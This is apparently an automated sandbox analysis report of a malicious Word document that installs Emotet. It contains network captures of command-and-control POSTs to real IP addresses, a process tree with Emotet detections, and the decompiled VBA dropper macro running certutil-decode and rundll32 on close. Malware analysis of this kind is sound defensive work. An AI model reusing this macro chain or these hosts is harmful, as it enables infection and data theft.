                                                                              Jan 14, 2021 03:27:53.753510952 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:53.753626108 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:53.805885077 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:53.805931091 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:54.360609055 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:54.360675097 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:54.360727072 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:54.360887051 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:54.360929012 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:57.363703012 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:57.363962889 CET491748080192.168.2.22188.226.165.170

                                                                              HTTP Request Dependency Graph

                                                                              • 91.121.87.90
                                                                                • 91.121.87.90:8080
                                                                              • 188.226.165.170
                                                                                • 188.226.165.170:8080

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.224917191.121.87.908080C:\Windows\SysWOW64\osk\rasadhlp.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 14, 2021 03:27:43.017992973 CET14360OUTPOST /bLyKQv7N53vEg8HnqG/AS5OEx79Hso/vmXj5PDqWcWGmmH57b/xq6PHaeNWW7/NgA8M5zv6E4oe8nfV/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate
                                                                              DNT: 1
                                                                              Connection: keep-alive
                                                                              Referer: 91.121.87.90/
                                                                              Upgrade-Insecure-Requests: 1
                                                                              Content-Type: multipart/form-data; boundary=----------------------Ewgsdu27Sw4BxMsbn629Ix
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: 91.121.87.90:8080
                                                                              Content-Length: 4468
                                                                              Cache-Control: no-cache
                                                                              Jan 14, 2021 03:27:43.130536079 CET14365INHTTP/1.1 404 Not Found
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 14 Jan 2021 02:27:43 GMT
                                                                              Content-Length: 19
                                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                              Data Ascii: 404 page not found


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.2249174188.226.165.1708080C:\Windows\SysWOW64\osk\rasadhlp.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 14, 2021 03:27:53.701368093 CET14367OUTPOST /U7j2Ca9v8QUvcqf/fA93hWSHl2n7EAFUn8S/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate
                                                                              DNT: 1
                                                                              Connection: keep-alive
                                                                              Referer: 188.226.165.170/
                                                                              Upgrade-Insecure-Requests: 1
                                                                              Content-Type: multipart/form-data; boundary=-------------------f9Qz0vwI2HdxXBENKKU
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: 188.226.165.170:8080
                                                                              Content-Length: 4468
                                                                              Cache-Control: no-cache
                                                                              Jan 14, 2021 03:27:54.360609055 CET14373INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Thu, 14 Jan 2021 02:27:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 3332
                                                                              Connection: keep-alive
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: ae e7 e7 95 54 e4 7d c8 ec 12 4f 29 5d fe 19 8b ae 88 b6 63 5f 7d 0c d5 10 81 74 89 d7 c0 4b dd 97 29 48 c1 16 2d 04 9c e4 c1 14 dc 45 56 5b f2 02 62 75 76 77 6b 45 76 6e 87 89 12 af b4 0e 70 fc 1f 89 41 66 ab 67 a9 e0 92 3e 78 a1 b5 c0 6e d2 5c f9 8e 8f 31 84 49 7c 97 f7 69 37 d2 30 49 f2 88 6e 84 53 15 c6 7e 12 cf 53 de f0 41 66 5b 73 d5 e4 16 b6 f5 29 bb da 13 e9 45 3f f0 e6 dc 7b cf 14 d2 2e 57 7f f1 08 7f 71 e0 b7 a3 22 c6 f0 6e 71 22 02 e0 84 97 7a b3 25 8e 83 62 f1 88 0a cf a8 f3 d4 f9 5a 5b c0 49 4f 76 2b c7 9a c6 f3 df 70 a6 93 38 d6 53 0b 34 ab 7f aa f0 4a 4c 6c dc 59 e5 0f e9 37 33 53 ba 0c a7 68 fe ac 30 5c 8c c6 da 08 4d 0c 2f 3e de c4 44 a8 da 1c 93 29 a9 eb c5 bf 16 a2 85 49 69 0d 23 7b 27 de d2 58 93 a1 88 84 ae 5e 8a b7 36 ab 9a b3 16 37 4e df c7 bb 0b 41 fe 25 9f 29 dc 35 d1 c8 21 87 0c a7 3a 1e 85 b5 15 39 0a e7 23 48 30 8a 78 42 4a ca db ce 75 fc 06 4f b7 4a df d0 e3 04 ab f7 85 ba 69 68 77 7d 16 dd 46 5b 37 a9 2b 03 60 1c 19 43 45 1c 60 3f f6 98 58 4c bf 94 29 f7 9d d2 06 4a a9 58 75 ea 9f 9f 2d 4f 11 7b 07 84 f9 5d 9a 6a f9 0d a2 cc c2 9a 99 81 46 50 20 6f 9d b9 a2 86 d5 48 fc 3c c1 12 4a c4 4f ea 99 72 5e cf 2e 51 fb 34 c3 01 4e b2 ae 87 97 69 c2 bc 87 fb 96 11 bd 7f 41 79 d7 63 24 47 99 56 04 46 03 9a 50 00 6d 5e 84 6a a3 01 e4 6a 00 ce d9 62 7a 1a 82 19 3b e4 41 57 f8 eb 92 a0 14 34 88 09 3c 5e 05 b4 bf e1 18 a8 db 17 30 03 1d a3 cb db ad 71 a9 54 57 ae 42 bb d5 91 51 00 73 67 2f 17 f2 89 09 13 2a f6 c7 9d b3 7a f7 dc 04 bb 49 c7 f0 d4 21 ea 48 6c 51 93 7a 4f 6e a9 f1 0c c9 8b fe 4e e3 77 72 a9 28 9e e9 ba 69 68 90 0c 8a af 40 a1 07 9e 58 1e 22 0f b6 b9 1d a3 96 40 65 f7 20 18 37 77 e0 dc 0f d7 e5 a4 52 ff 43 77 f0 58 22 78 de d7 f2 56 90 58 5c f8 11 b9 35 26 15 ec 6f 51 6a 6e c5 c6 2a fd 2d 48 63 a5 a0 f3 09 88 63 4f 8d 53 5c c2 3f 2d 98 e4 9f 38 3c 1c 8a 72 54 6b bc 58 d0 db 9f d7 1c 37 b9 8f 6e 14 eb af 5b 2b af d0 88 96 21 86 77 db 20 a0 61 25 81 ed b4 f1 6c 10 19 72 2f ec 13 67 ad 52 7c 64 02 68 88 61 66 58 50 b7 ef 86 11 27 94 3d f3 f2 72 36 12 e8 97 b6 4a 99 4e 2d 6e 55 96 7e 54 9a 7e 91 d2 9b f2 5c 54 da 5e 90 04 2f 45 8a 1b 09 9b ed c8 e1 d5 d7 c8 ef 17 41 cd 09 f1 ea 4d c7 31 1f 8f f7 1c 28 1f 97 ba 98 4f 82 8e 6c 19 71 a3 d5 68 13 9c de be 52 43 ce ee 3f 0a 60 43 fa 5d f3 9a f4 3f 04 61 b8 2b 3d 8d ad 8f 7d 4d a0 44 31 eb 63 d3 ae 9b 40 76 e8 8e 65 37 7f 1e 52 e0 30 ce 91 e9 44 66 7c cd 81 a1 94 f3 fb cc da 9b ac e8 28 d2 3f 23 12 b6 4b a6 f8 55 1e 66 da c0 09 2b 1f ec 97 3a 80 c2 2d 39 1f 8a a8 ee 3d a2 3a 20 aa 6b 33 82 60 bf db a4 87 6a 70 fb 7b 96 8b c3 28 80 21 9f 1b 53 cd 3f 86 94 4f 9b 86 ce 13 3a b7 7c e1 e6 40 6a 71 b3 25 a2 a6 78 38 c3 ac d2 de 81 1b cc 43 41 ec f2 7b 61 52 d8 ac 5e ef fb 2c 41 68 70 af 12 24 68 12 a0 90 3c 97 27 20 39 7f 3a 99 f3 ab 3c 52 12 e4 52 f3 44 0b 58 98 3d 0f 79 c8 b7 8c 0d cf 6d a0 ba bf 82 34 82 19 16 08 26 e9 45 ef 61 c2 9e fa b9 d3 52 59 b0 bd 58 d8 7a 5e 03 d7 0d 61 91 fc a2 b4 3d 4f 9e e6 0e 44 e0 e1 51 21 d5 dc 8d d0 cd 01 14 25 93 fd c1 60 cc 2b aa 71 ee 93 66 1b 11 4e 46 7c b2 92 98 be 3a c2 f1 9d 15 b0 2a 81 dc 70 09 82 13 53 77 31 b7 2a bf 49 6f cf e0 6c 2e 80 2d 54 d6 84 28 3b 84 10 41 c8 9e 9b 41 c3 e6 6f 47 43 c7 d9 61 60 ea c2 99 1c 64 f9 ed 45 bb c2 0b f6 45 fe 7e 6f 1e 33 19 b2 96 f3 ac af c1 20 c0 cd 28 70 fa c6 a6 d9 20 d1 e4 f0 7a 4b 5a 94 e5 90 89 40 c0 88 33 fb 8e 34 64 7c ba 76 82 f5 c1 f8 1f d6 5e 8e 81 47 63 cb 3a 39 30 bb d1 b2 22 63 50 4f fa 67 3d 25 8d 28 3d 4f b3 f5 ea 44 d9 1f dc ce d5 57 95 10 0a 88 0d 92 c5
                                                                              Data Ascii: T}O)]c_}tK)H-EV[buvwkEvnpAfg>xn\1I|i70InS~SAf[s)E?{.Wq"nq"z%bZ[IOv+p8S4JLlY73Sh0\M/>D)Ii#{'X^67NA%)5!:9#H0xBJuOJihw}F[7+`CE`?XL)JXu-O{]jFP oH<JOr^.Q4NiAyc$GVFPm^jjbz;AW4<^0qTWBQsg/*zI!HlQzOnNwr(ih@X"@e 7wRCwX"xVX\5&oQjn*-HccOS\?-8<rTkX7n[+!w a%lr/gR|dhafXP'=r6JN-nU~T~\T^/EAM1(OlqhRC?`C]?a+=}MD1c@ve7R0Df|(?#KUf+:-9=: k3`jp{(!S?O:|@jq%x8CA{aR^,Ahp$h<' 9:<RRDX=ym4&EaRYXz^a=ODQ!%`+qfNF|:*pSw1*Iol.-T(;AAoGCa`dEE~o3 (p zKZ@34d|v^Gc:90"cPOg=%(=ODW


                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              Analysis Process: WINWORD.EXE PID: 1144 Parent PID: 584

                                                                              General

                                                                              Start time:03:25:32
                                                                              Start date:14/01/2021
                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                              Imagebase:0x13f5a0000
                                                                              File size:1424032 bytes
                                                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: certutil.exe PID: 2324 Parent PID: 1520

                                                                              General

                                                                              Start time:03:26:53
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\System32\certutil.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
                                                                              Imagebase:0xfffa0000
                                                                              File size:1192448 bytes
                                                                              MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Chronological Activities

                                                                              Analysis Process: svchost.exe PID: 2836 Parent PID: 428

                                                                              General

                                                                              Start time:03:26:55
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                              Imagebase:0xff0e0000
                                                                              File size:27136 bytes
                                                                              MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              Chronological Activities

                                                                              Analysis Process: tmp_e473b4.exe PID: 1840 Parent PID: 3024

                                                                              General

                                                                              Start time:03:27:09
                                                                              Start date:14/01/2021
                                                                              Path:C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2284485202.0000000000906000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000003.2277604506.0000000000908000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: WPDShextAutoplay.exe PID: 1888 Parent PID: 1840

                                                                              General

                                                                              Start time:03:27:11
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000003.2283230034.0000000000358000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2287635770.0000000000356000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: shellstyle.exe PID: 2208 Parent PID: 1888

                                                                              General

                                                                              Start time:03:27:13
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2292525309.00000000005E6000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000003.2287962636.00000000005E8000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: NlsLexicons0416.exe PID: 2908 Parent PID: 2208

                                                                              General

                                                                              Start time:03:27:16
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2296618832.00000000005D6000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000003.2292414535.00000000005D8000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: mobsync.exe PID: 2504 Parent PID: 2908

                                                                              General

                                                                              Start time:03:27:18
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\mfc110fra\mobsync.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\mfc110fra\mobsync.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000003.2296898550.0000000000608000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2301536313.00000000005C4000.00000004.00000020.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: jsproxy.exe PID: 2552 Parent PID: 2504

                                                                              General

                                                                              Start time:03:27:20
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\capisp\jsproxy.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\capisp\jsproxy.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000003.2301449687.0000000000338000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2305771628.00000000002F4000.00000004.00000020.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: dllhost.exe PID: 2484 Parent PID: 2552

                                                                              General

                                                                              Start time:03:27:22
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\riched20\dllhost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\riched20\dllhost.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000003.2306168879.0000000000538000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2309893480.00000000004F4000.00000004.00000020.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: apds.exe PID: 2336 Parent PID: 2484

                                                                              General

                                                                              Start time:03:27:24
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\KBDMLT47\apds.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\KBDMLT47\apds.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000003.2310473820.0000000000648000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2314627073.0000000000646000.00000004.00000020.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: upnp.exe PID: 1788 Parent PID: 2336

                                                                              General

                                                                              Start time:03:27:26
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2321415982.0000000000536000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000003.2315225501.0000000000538000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: rasadhlp.exe PID: 2080 Parent PID: 1788

                                                                              General

                                                                              Start time:03:27:29
                                                                              Start date:14/01/2021
                                                                              Path:C:\Windows\SysWOW64\osk\rasadhlp.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\osk\rasadhlp.exe
                                                                              Imagebase:0x400000
                                                                              File size:344110 bytes
                                                                              MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Visual Basic
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2429576153.0000000000534000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000003.2321112470.0000000000578000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Disassembly

                                                                              Code Analysis

                                                                              VBA Code

                                                                              Call Graph

                                                                              Graph

                                                                              • Entrypoint
                                                                              • Decryption Function
                                                                              • Executed
                                                                              • Not Executed
                                                                              • Show Help
                                                                              callgraph 34 Document_Close 38 Form_Close Delete:1,Sleep:1,CreateObject:1 34->38 131 Button_Click2 Left:1 38->131 x 4 164 SaveAs3 38->164 x 2 179 SetTask create:1 38->179 x 2 151 Button_Click3 Right:1,Range:1

                                                                              Module: ThisDocument

                                                                              Declaration
                                                                              LineContent
                                                                              1

                                                                              Attribute VB_Name = "ThisDocument"

                                                                              2

                                                                              Attribute VB_Base = "1Normal.ThisDocument"

                                                                              3

                                                                              Attribute VB_GlobalNameSpace = False

                                                                              4

                                                                              Attribute VB_Creatable = False

                                                                              5

                                                                              Attribute VB_PredeclaredId = True

                                                                              6

                                                                              Attribute VB_Exposed = True

                                                                              7

                                                                              Attribute VB_TemplateDerived = True

                                                                              8

                                                                              Attribute VB_Customizable = True

                                                                              9

                                                                              #if VBA7 then

                                                                              10

                                                                              Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One as Long) as Long

                                                                              11

                                                                              #else

                                                                              12

                                                                              Private Declare Function Sleep Lib "Kernel32" (ByVal One as Long) as Long

                                                                              13

                                                                              #endif

                                                                              14

                                                                              Private Ms13

                                                                              15

                                                                              Private One as String

                                                                              16

                                                                              Private Two as String

                                                                              17

                                                                              Private STP as String

                                                                              Executed Functions
                                                                              Subroutine Form_Close, APIs: 19, Strings: 2, Number of lines: 12, Relevance: 48.012
                                                                              APIsMeta Information

                                                                              Part of subcall function Button_Click2@ThisDocument: Left

                                                                              Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                                              CreateObject

                                                                              		CreateObject("winmgmts:Win32_Process")

                                                                              Part of subcall function Button_Click2@ThisDocument: Left

                                                                              Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                                              Part of subcall function Button_Click2@ThisDocument: Left

                                                                              Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                                              Part of subcall function Button_Click2@ThisDocument: Left

                                                                              Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                                              Delete

                                                                              Part of subcall function SaveAs3@ThisDocument: SaveAs2

                                                                              Part of subcall function SaveAs3@ThisDocument: wdFormatText

                                                                              Part of subcall function SaveAs3@ThisDocument: SaveAs2

                                                                              Part of subcall function SaveAs3@ThisDocument: wdFormatText

                                                                              Part of subcall function SetTask@ThisDocument: create

                                                                              Part of subcall function SetTask@ThisDocument: act

                                                                              Kernel32!Sleep

                                                                              		Kernel32!Sleep(6000)

                                                                              Part of subcall function SetTask@ThisDocument: create

                                                                              Part of subcall function SetTask@ThisDocument: act

                                                                              StringsDecrypted Strings
                                                                              "xls"
                                                                              "doc"
                                                                              LineInstructionMeta Information
                                                                              22

                                                                              Private Sub Form_Close()

                                                                              23

                                                                              STP = Button_Click2(2, 16) + "Ksh1"

                                                                              executed
                                                                              24

                                                                              Set Ms13 = CreateObject(Button_Click2(4, 22))

                                                                              CreateObject("winmgmts:Win32_Process")

                                                                              executed
                                                                              25

                                                                              One = Button_Click2(8, 16)

                                                                              26

                                                                              Two = Button_Click2(6, 8)

                                                                              27

                                                                              ActiveDocument.Range(Start := 0, End := 3561).Delete

                                                                              Delete

                                                                              28

                                                                              SaveAs3 ("xls")

                                                                              28

                                                                              SaveAs3 ("doc")

                                                                              29

                                                                              SetTask (One + " " + STP + ".xls " + STP + ".pdf")

                                                                              29

                                                                              Sleep 6000

                                                                              Kernel32!Sleep(6000)

                                                                              executed
                                                                              29

                                                                              SetTask (Two + " " + STP + ".pdf,In")

                                                                              30

                                                                              End Sub

                                                                              Subroutine Document_Close, APIs: 3, Strings: 0, Number of lines: 3, Relevance: 6.003
                                                                              APIsMeta Information

                                                                              Part of subcall function Form_Close@ThisDocument: CreateObject

                                                                              Part of subcall function Form_Close@ThisDocument: Delete

                                                                              Part of subcall function Form_Close@ThisDocument: Sleep

                                                                              LineInstructionMeta Information
                                                                              19

                                                                              Private Sub Document_Close()

                                                                              20

                                                                              Form_Close

                                                                              executed
                                                                              21

                                                                              End Sub

                                                                              Function SetTask, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 10.503
                                                                              APIsMeta Information

                                                                              create

                                                                              		SWbemObjectEx.create("Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf",,,) -> 0 SWbemObjectEx.create("Rundll32 C:\Users\Public\Ksh1.pdf,In",,,) -> 0

                                                                              act

                                                                              LineInstructionMeta Information
                                                                              40

                                                                              Private Function SetTask(Task as String)

                                                                              41

                                                                              Ms13.create Task, Null, Null, act

                                                                              SWbemObjectEx.create("Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf",,,) -> 0

                                                                              act

                                                                              executed
                                                                              42

                                                                              End Function

                                                                              Function Button_Click2, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503
                                                                              APIsMeta Information

                                                                              Left

                                                                              Paragraphs

                                                                              LineInstructionMeta Information
                                                                              31

                                                                              Private Function Button_Click2(One as Long, Two as Long) as String

                                                                              32

                                                                              Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two)

                                                                              Left

                                                                              Paragraphs

                                                                              executed
                                                                              33

                                                                              End Function

                                                                              Function SaveAs3, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503
